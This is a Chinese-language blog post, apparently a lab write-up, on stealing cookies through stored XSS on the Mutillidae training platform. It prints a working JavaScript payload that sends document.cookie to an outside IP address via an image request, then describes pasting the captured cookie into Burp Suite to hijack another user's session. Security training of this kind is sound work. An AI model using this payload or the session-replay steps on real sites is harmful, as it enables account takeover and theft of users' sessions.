mutillidae平台:XSS Payload 之cookie窃取练习

此次练习主要是用mutillidae靶场实现了《白帽子讲web安全》上的xss payload 窃取用户cookie实例。

需要创建两个用户进行测试:墨中白,test

用账号墨中白进入xss blog练习页面:

mutillidae平台:XSS Payload 之cookie窃取练习_第1张图片

在文本框中插入代码

连接远程服务器上的js代码执行js源码为:

var str = document.cookie;
var img = document.createElement("img");
img.src = "http://47.116.10.120/log?"+escape(str);
document.body.appendChild(img);

保存后,也就是当别的用户浏览用户墨中白的博客时就会发送他自己的cookie到服务器的一个文件中,服务器中该文件可以不存在直接查看日志也能查到记录 

OK,上传博客。

登录另一个账号test,查看博客:

mutillidae平台:XSS Payload 之cookie窃取练习_第2张图片

此时,前面js代码中设置的服务器的日志文件中就已经记录了test用户的get请求,可以直接在日志中查看到test的cookie:

mutillidae平台:XSS Payload 之cookie窃取练习_第3张图片

OK

打开kali

mutillidae平台:XSS Payload 之cookie窃取练习_第4张图片

可以看到是没有登录的,用burpsuit改下包,将日志中的cookie粘贴到Cookie上

mutillidae平台:XSS Payload 之cookie窃取练习_第5张图片

再看浏览器,用户已经变成了test:

mutillidae平台:XSS Payload 之cookie窃取练习_第6张图片

成功窃取cookie~

你可能感兴趣的:(总结,web渗透)